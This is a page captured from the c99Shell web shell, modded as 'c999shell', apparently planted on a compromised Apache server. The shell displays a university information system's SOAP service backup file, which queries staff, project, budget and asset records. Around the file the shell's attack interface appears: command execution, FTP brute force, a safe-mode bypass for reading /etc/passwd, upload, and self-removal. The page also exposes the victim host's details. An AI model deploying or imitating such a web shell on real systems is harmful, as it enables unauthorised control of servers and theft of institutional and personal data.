!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/ws_standard_on_mis/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mis_standard.php.bak (19.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once('nusoap.php');

//-----------------------------------------------------Teachers_now
function teachers_now($search_teachers_now) {


$information = '<?xml version="1.0" encoding="windows-874"?>';
$information .= "\n<Teachers_now>";
//teacher
$information .= "\n<teachers>";
$dsn_name = "staff";
$username =""; 
$password =""; 
$connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); 
//$sql = "SELECT *,TEmployee.id as tempid,TPrefix.name as prefixname FROM TEmployee,TWorkStatus,TPosScale,TPrefix WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TEmployee.Prefix_id=TPrefix.id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";

$sql = "select count(*) as countP from( SELECT *,TEmployee.id as tempid,TPrefix.name as prefixname,TPosition.name as positionname FROM TEmployee,TWorkStatus,TPosScale,TPrefix,TPosition
 WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TEmployee.Prefix_id=TPrefix.id) and (TWorkStatus.id = '0')  and (TPosScale.TPos_id=TPosition.id) and (TPosScale.TPos_id = '0014' or TPosScale.TPos_id = '0017') and (TPosScale.Duty_id='8') order by TEmployee.id)";
$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
$count_people_8=0;
while($row1 = odbc_fetch_array($execute))
{
$count_people_8=$row1["countP"];
}
$count_people_8 = ($count_people_8/2);

$sql = "SELECT *,TEmployee.id as tempid,TPrefix.name as prefixname,TPosition.name as positionname FROM TEmployee,TWorkStatus,TPosScale,TPrefix,TPosition WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TEmployee.Prefix_id=TPrefix.id) and (TWorkStatus.id = '0')  and (TPosScale.TPos_id=TPosition.id) and (TPosScale.TPos_id = '0014' or TPosScale.TPos_id = '0017') order by TEmployee.id";
$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
$i=1;
$num1=0;
while($row = odbc_fetch_array($execute))
{
	$num1++;
	$id=$row["tempid"];
	$idx=$row["idx"];
	$prefixname=$row["prefixname"];
	$name=$row["fname"];
	$surname=$row["lname"];
	$position=$row["positionname"];
    $cnow=$row["c_now"];

$information .= "\n<teacher>";
	$information .= "\n<teacher_id>";
		$information .= "$id";
	$information .= "\n</teacher_id>";

	$information .= "\n<person_id>";
		$information .= "$idx";
	$information .= "\n</person_id>";

	$information .= "\n<teacher_prefixname>";
		$information .= "$prefixname";
	$information .= "\n</teacher_prefixname>";

	$information .= "\n<teacher_fname>";
		$information .= "$name";
	$information .= "\n</teacher_fname>";

	$information .= "\n<teacher_lname>";
		$information .= "$surname";
	$information .= "\n</teacher_lname>";

   $information .= "\n<teacher_position>";
		$information .= "$position";
	$information .= "\n</teacher_position>";

$information .= "\n<teacher_cnow>";
		$information .= "$cnow";
	$information .= "\n</teacher_cnow>";

$information .= "\n</teacher>";
}
// ¨º loop

//$num1 = $num1-$count_people_8;
$num1 = $num1-$count_people_8;
$information .= "\n</teachers>";

$information .= "\n<num_teachers>";
	$information .= "$num1";
$information .= "\n</num_teachers>";

$information .= "\n</Teachers_now>";
return $information;
}



//--------------------------------------------------------Projects_of_outservice

function projects_of_outservice($search_projects_of_outservice,$search_term_date_start,$search_term_date_end) {
$information = '<?xml version="1.0" encoding="windows-874"?>';

$information .= "\n<Projects_of_outservice>";
//project
$information .= "\n<projects>";
$dsn_name = "project";
$username =""; 
$password =""; 
$connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); 
//selece_database_project
	$sql = "SELECT TProject.id, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id ,TProject.sdate , TProject.edate FROM TProject, TTypeProject, TTypeProjectSub  WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01')";
	//$sql = "SELECT TProject.id, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id ,TProject.sdate , TProject.edate FROM TProject, TTypeProject, TTypeProjectSub  WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01') and (TProject.sdate > '1%')";
	$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");

	$i=1;
	$num1=0;
	while($row = odbc_fetch_array($execute))
	{
	$TProject_id=$row['id'];
	$TProject_NameT=$row["NameT"];
	$TProject_NameE=$row["NameE"];
	$TProject_Type_id=$row["Type_id"];
	$TProject_TypeSub_id=$row["TypeSub_id"];
    $TProject_sdate=$row["sdate"];
    $TProject_edate=$row["edate"];

//selece_database_TTypeProject
	$sql2 = "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')";
	$execute2 = odbc_exec($connect, $sql2) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
	while($row2 = odbc_fetch_array($execute2))
	{
		$TTypeProject_id=$row2["id"];
		$TTypeProject_name=$row2["name"];
	}

//selece_database_TTypeProjectSub
	$sql3 = "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')";
	//$sql = "SELECT * FROM TProject";
	$execute3 = odbc_exec($connect, $sql3) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
	while($row3 = odbc_fetch_array($execute3))
	{
		$TTypeProjectSub_id=$row3["id"];
		$TTypeProjectSub_name=$row3["name"];
	}
		$TProject_sdate_c = substr($TProject_sdate, 0, 10); 
	//$TProject_sdate_c = sprintf("%01d", $TProject_sdate_c);



if ($TProject_sdate_c >= $search_term_date_start and $TProject_sdate_c <= $search_term_date_end) {
$num1++;
$information .= "\n<project>";

	$information .= "\n<project_id>";
		$information .= "$TProject_id";
	$information .= "\n</project_id>";

	$information .= "\n<project_tname>";
		$information .= "$TProject_NameT";
	$information .= "\n</project_tname>";

	$information .= "\n<project_ename>";
		$information .= "$TProject_NameE";
	$information .= "\n</project_ename>";

	$information .= "\n<project_type_id>";
		$information .= "$TProject_Type_id";
	$information .= "\n</project_type_id>";

	$information .= "\n<project_type_name>";
		$information .= "$TTypeProject_name";
	$information .= "\n</project_type_name>";

	$information .= "\n<project_typesub_id>";
		$information .= "$TProject_TypeSub_id";
	$information .= "\n</project_typesub_id>";

	$information .= "\n<project_typesub_name>";
		$information .= "$TTypeProjectSub_name";
	$information .= "\n</project_typesub_name>";

	$information .= "\n<project_sdate>";
		$information .= "$TProject_sdate";
	$information .= "\n</project_sdate>";

	$information .= "\n<project_edate>";
		$information .= "$TProject_edate";
	$information .= "\n</project_edate>";

	$information .= "\n<project_date>";
		$information .= "$search_term_date_start,$search_term_date_end";
	$information .= "\n</project_date>";

$information .= "\n</project>";
}
}
//end_selece_database_project

$information .= "\n</projects>";
//project

$information .= "\n<num_projects>";
	$information .= "$num1";
$information .= "\n</num_projects>";




$information .= "\n</Projects_of_outservice>";


return $information;
}



//-----------------------------------------------------Committees_of_teacher
function committees_of_teacher($search_Committees_of_teacher) {


$information = '<?xml version="1.0" encoding="windows-874"?>';

//Committees_of_teacher
$information .= "\n<Committees_of_teacher>";
//committees
$information .= "\n<committees>";
$dsn_name = "staff";
$username =""; 
$password =""; 
$connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); 
//selece_database_project
//$sql = "SELECT * FROM TFileCommittee, TEmployee WHERE  TFileCommittee.TEmp_id=TEmployee.Id";
//$sql = "SELECT * FROM TProject";
$sql = "SELECT *,TEmployee.id as tempid FROM TFileCommittee, TEmployee,TWorkStatus,TPosScale WHERE  TFileCommittee.TEmp_id=TEmployee.Id and (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");

$i=1;
$num1=0;
$num2=0;
$TEmployee_id_check="";
while($row = odbc_fetch_array($execute))
{
		$num2++;

$TEmployee_id=$row['tempid'];
$TEmployee_fname=$row["fname"];
$TEmployee_lname=$row["lname"];
$TFileCommittee_order_no=$row["order_no"];
$TFileCommittee_ttile=$row["TTitle"];
if($TEmployee_id!=$TEmployee_id_check)
	{
		$num1++;
	}
$TEmployee_id_check=$TEmployee_id;




$information .= "\n<committee>";

	$information .= "\n<temp_id>";
		$information .= "$TEmployee_id";
	$information .= "\n</temp_id>";

	$information .= "\n<temp_fname>";
		$information .= "$TEmployee_fname";
	$information .= "\n</temp_fname>";

	$information .= "\n<temp_lname>";
		$information .= "$TEmployee_lname";
	$information .= "\n</temp_lname>";

	$information .= "\n<order_no>";
		$information .= "$TFileCommittee_order_no";
	$information .= "\n</order_no>";

	$information .= "\n<t_title>";
		$information .= "$TFileCommittee_ttile";
	$information .= "\n</t_title>";



$information .= "\n</committee>";
}
//end_selece_database_project


$information .= "\n</committees>";
//end_committee

$information .= "\n<num_teacher_committees>";
	$information .= "$num1";
$information .= "\n</num_teacher_committees>";

$information .= "\n<num_committees_of_teacher>";
	$information .= "$num2";
$information .= "\n</num_committees_of_teacher>";

$information .= "\n</Committees_of_teacher>";
return $information;
}



//-----------------------------------------------------Project_budget
//function project_budget($search_project_budget,$search_term_date_start,$search_term_date_end) {
function project_budget($search_project_budget) {


$information = '<?xml version="1.0" encoding="windows-874"?>';
//Project_budget
$information .= "\n<Project_budget>";

//project
$information .= "\n<projects>";
$dsn_name = "project";
$username =""; 
$password =""; 
$connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); 
//selece_database_project
//$sql = "SELECT TProject.id as a, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id ,TProject.sdate , TProject.edate , TProject.budget3 , TProject.budget4, TProject.budget2 FROM TProject, TTypeProject, TTypeProjectSub  WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01')";

$sql = "SELECT TProject.id as a, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id, TProject.sdate , TProject.edate ,TProject.budget3 , TProject.budget4, TProject.budget2 FROM TProject, TTypeProject, TTypeProjectSub WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01') ";
	$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");

	$i=1;
	$num1=0;
	while($row = odbc_fetch_array($execute))
	{
$TProject_id=$row['a'];
$TProject_NameT=$row["NameT"];
$TProject_NameE=$row["NameE"];
$TProject_Type_id=$row["Type_id"];
$TProject_TypeSub_id=$row["TypeSub_id"];
//$TProject_sdate1=$row["sdate"];
//$TProject_edate1=$row["edate"];

$TProject_budget2=$row["budget2"];
$TProject_budget3=$row["budget3"];
$TProject_budget4=$row["budget4"];


//selece_database_TTypeProject
	$sql2 = "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')";
	$execute2 = odbc_exec($connect, $sql2) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
	while($row2 = odbc_fetch_array($execute2))
	{
		$TTypeProject_id=$row2["id"];
		$TTypeProject_name=$row2["name"];
	}

//selece_database_TTypeProjectSub
	$sql3 = "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')";
	//$sql = "SELECT * FROM TProject";
	$execute3 = odbc_exec($connect, $sql3) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é");
	while($row3 = odbc_fetch_array($execute3))
	{
		$TTypeProjectSub_id=$row3["id"];
		$TTypeProjectSub_name=$row3["name"];
	}
		$TProject_sdate_d = substr($TProject_sdate, 0, 10); 
	//$TProject_sdate_c = sprintf("%01d", $TProject_sdate_c);

if ($TProject_sdate_d >= $search_term_date_start and $TProject_sdate_d <= $search_term_date_end) {
$num1++;
$information .= "\n<project>";

	$information .= "\n<project_id>";
		$information .= "$TProject_id";
	$information .= "\n</project_id>";

	$information .= "\n<project_tname>";
		$information .= "$TProject_NameT";
	$information .= "\n</project_tname>";

	$information .= "\n<project_ename>";
		$information .= "$TProject_NameE";
	$information .= "\n</project_ename>";

	$information .= "\n<project_type_id>";
		$information .= "$TProject_Type_id";
	$information .= "\n</project_type_id>";

	$information .= "\n<project_type_name>";
		$information .= "$TTypeProject_name";
	$information .= "\n</project_type_name>";

/*	$information .= "\n<project_sdate>";
		$information .= "$TProject_sdate1";
	$information .= "\n</project_sdate>";

$information .= "\n<project_edate>";
		$information .= "$TProject_edate1";
	$information .= "\n</project_edate>";

	$information .= "\n<project_date>";
		$information .= "$search_term_date_start,$search_term_date_end";
	$information .= "\n</project_date>";
*/
	$information .= "\n<budget2>";
	$information .= "$TProject_budget2";
$information .= "\n</budget2>";

	$information .= "\n<budget3>";
		$information .= "$TProject_budget3";
	$information .= "\n</budget3>";

	$information .= "\n<budget4>";
		$information .= "$TProject_budget4";
	$information .= "\n</budget4>";


$information .= "\n</project>";

$TProject_budget2_sum=$TProject_budget2_sum+$TProject_budget2;
$TProject_budget3_sum=$TProject_budget3_sum+$TProject_budget3;
$TProject_budget4_sum=$TProject_budget4_sum+$TProject_budget4;


}
//end_selece_database_project

$information .= "\n</projects>";
//sum_Project_budget
	$information .= "\n<budget2_sum>";
		$information .= "$TProject_budget2_sum";
	$information .= "\n</budget2_sum>";

	$information .= "\n<budget3_sum>";
		$information .= "$TProject_budget3_sum";
	$information .= "\n</budget3_sum>";

	$information .= "\n<budget4_sum>";
		$information .= "$TProject_budget4_sum";
	$information .= "\n</budget4_sum>";




$information .= "\n</Project_budget>";
return $information;
}

//-----------------------------------------------------asset_permanent----------------------------------
//function projects_of_outservice($search_projects_of_outservice,$search_term_date_start,$search_term_date_end) {

function asset_permanent($search_asset_permanent) {

$information = '<?xml version="1.0" encoding="windows-874"?>';
//asset_permanent
$information .= "\n<asset_permanent>";

//asset_permanent
$information .= "\n<assets>";
$dsn_name = "asset";
$username =""; 
$password =""; 
$connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); 
//selece_database_asset

$sql = "SELECT TBase_budget.id as a, TBase.name, TBase.bye_year, TBase.pirce, TBase_budget.budgetyear ,TBase_budget.amount , TBase.TTypecate_id , TTypeCatagory.id FROM TBase, TBase_budget, TTypeCatagory WHERE (TBase.id = TBase_budget.id) and (TBase.TTypecate_id = TTypeCatagory.id) and ( (TBase.TTypecate_id = '100') or (TBase.TTypecate_id = '101') )and  (TBase_budget.budgetyear = 2550)";
    $num1=0;
	$sum ="";
	$sum100 = "";
	$sum101 = "";
    $sum102 = "";
	$execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é $sql");
	while($row = odbc_fetch_array($execute))
	{
$TBase_id=$row['a'];
$TBase_name=$row["name"];
$TBase_bye_year=$row["bye_year"];
$TBase_pirce=$row["pirce"];
$TBase_amount=$row["amount"];
$TTypecate_id=$row["TTypecate_id"];

$num1++;
$information .= "\n<asset>";

	$information .= "\n<asset_id>";
		$information .= "$TBase_id";
	$information .= "\n</asset_id>";

	$information .= "\n<asset_name>";
		$information .= "$TBase_name";
	$information .= "\n</asset_name>";

	$information .= "\n<asset_bye_year>";
		$information .= "$TBase_bye_year";
	$information .= "\n</asset_bye_year>";

	$information .= "\n<asset_pirce>";
		$information .= "$TBase_pirce";
	$information .= "\n</asset_pirce>";

	$information .= "\n<amount>";
		$information .= "$TBase_amount";
	$information .= "\n</amount>";

    $information .= "\n<Typecate>";
		$information .= "$TTypecate_id";
	$information .= "\n</Typecate>";

$information .= "\n</asset>";

if ($TTypecate_id == '100') {
	$sum100 = $sum100 + $TBase_amount;
}

if ($TTypecate_id == '101') {
	$sum101 = $sum101 + $TBase_amount;
}

if ($TTypecate_id == '102') {
	$sum102 = $sum102 + $TBase_amount;
}
$sum=$sum100+$sum101+$sum102;
}
$information .= "\n</assets>";
	

//sum_asset_permanent
	$information .= "\n<base_sum>";
		$information .= "$sum100";
	$information .= "\n</base_sum>";

	$information .= "\n<build_sum>";
		$information .= "$sum101";
	$information .= "\n</build_sum>";

	$information .= "\n<asset_sum>";
		$information .= "$sum102";
	$information .= "\n</asset_sum>";

	$information .= "\n<sum>";
		$information .= "$sum";
	$information .= "\n</sum>";

$information .= "\n</asset_permanent>";

return $information;
}


//-------------------------------------------

$server = new soap_server;
$server->configureWSDL('standard_3_wsdl', 'urn:standard_3_wsdl');


$server->register('teachers_now',                
    array('search_teachers_now' => 'xsd:string'),        
    array('information' => 'xsd:string'),      
    'http://localhost/ws_standard_on_mis/',                   
    'http://localhost/ws_standard_on_mis/',           
    'rpc',                               
    'encoded',                            
    'Search_For_teachers_now');
//$search_term_date_start,$search_term_date_end
$server->register('projects_of_outservice',                
    array('search_projects_of_outservice' => 'xsd:string','search_term_date_start' => 'xsd:string','search_term_date_end' => 'xsd:string'),
      
    array('information' => 'xsd:string'),      
    'http://localhost/ws_standard_on_mis/',                    
    'http://localhost/ws_standard_on_mis/',               
    'rpc',                               
    'encoded',                            
    'Search_For_projects_of_outservice');

$server->register('committees_of_teacher',                
    array('search_committees_of_teacher' => 'xsd:string'),        
    array('information' => 'xsd:string'),      
    'http://localhost/ws_standard_on_mis/',                    
    'http://localhost/ws_standard_on_mis/',               
    'rpc',                               
    'encoded',                            
    'Search_For_committees_of_teacher');

$server->register('project_budget',                
array('search_project_budget' => 'xsd:string'),      
   // array('search_project_budget' => 'xsd:string','search_term_date_start' => 'xsd:string','search_term_date_end' => 'xsd:string'),
    array('information' => 'xsd:string'),      
    'http://localhost/ws_standard_on_mis/',                
    'http://localhost/ws_standard_on_mis/',            
    'rpc',                               
    'encoded',                            
    'Search_For_project_budget');


$server->register('asset_permanent',                
    array('search_asset_permanent' => 'xsd:string'),        
    array('information' => 'xsd:string'),      
    'http://localhost/ws_standard_on_mis/',                
    'http://localhost/ws_standard_on_mis/',            
    'rpc',                               
    'encoded',                            
    'Search_For_asset_permanent');


$HTTP_RAW_POST_DATA = isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : '';
$server->service($HTTP_RAW_POST_DATA);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0137 ]--